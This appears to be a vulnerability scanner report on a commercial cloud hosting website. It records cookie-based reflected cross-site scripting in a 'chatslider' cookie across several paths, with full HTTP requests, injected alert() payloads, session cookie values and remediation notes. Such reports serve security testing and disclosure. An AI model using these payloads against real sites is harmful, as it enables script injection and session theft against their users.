HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:36:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af78"%3balert(1)//fc1df1d7525 was submitted in the chatslider cookie. This input was echoed as 1af78";alert(1)//fc1df1d7525 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloudU HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1af78"%3balert(1)//fc1df1d7525; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:37:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 219de"%3balert(1)//0249fa797b2 was submitted in the chatslider cookie. This input was echoed as 219de";alert(1)//0249fa797b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloudU/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D219de"%3balert(1)//0249fa797b2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9236f"><script>alert(1)</script>36b0244798b was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloudU/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D9236f"><script>alert(1)</script>36b0244798b; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45758"><script>alert(1)</script>1279bf06213 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_demos HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D45758"><script>alert(1)</script>1279bf06213; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a886c"%3balert(1)//7b6faca5503 was submitted in the chatslider cookie. This input was echoed as a886c";alert(1)//7b6faca5503 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_demos HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Da886c"%3balert(1)//7b6faca5503; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40066
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8d52"%3balert(1)//52e1ba3187d was submitted in the chatslider cookie. This input was echoed as d8d52";alert(1)//52e1ba3187d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_demos/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dd8d52"%3balert(1)//52e1ba3187d; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40037
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68040"><script>alert(1)</script>f38fb66c69a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_demos/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D68040"><script>alert(1)</script>f38fb66c69a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40112
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a4e2"%3balert(1)//a272c516181 was submitted in the chatslider cookie. This input was echoed as 5a4e2";alert(1)//a272c516181 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_faq/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D5a4e2"%3balert(1)//a272c516181; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7545"><script>alert(1)</script>8abcb03a760 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_faq/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Db7545"><script>alert(1)</script>8abcb03a760; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1b2"><script>alert(1)</script>855dd3f9e2 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8a1b2"><script>alert(1)</script>855dd3f9e2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c050"%3balert(1)//11e221f438f was submitted in the chatslider cookie. This input was echoed as 1c050";alert(1)//11e221f438f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1c050"%3balert(1)//11e221f438f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24281"%3balert(1)//23d72342c08 was submitted in the chatslider cookie. This input was echoed as 24281";alert(1)//23d72342c08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/files HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D24281"%3balert(1)//23d72342c08; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1289e"><script>alert(1)</script>7b1f68a0f4a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
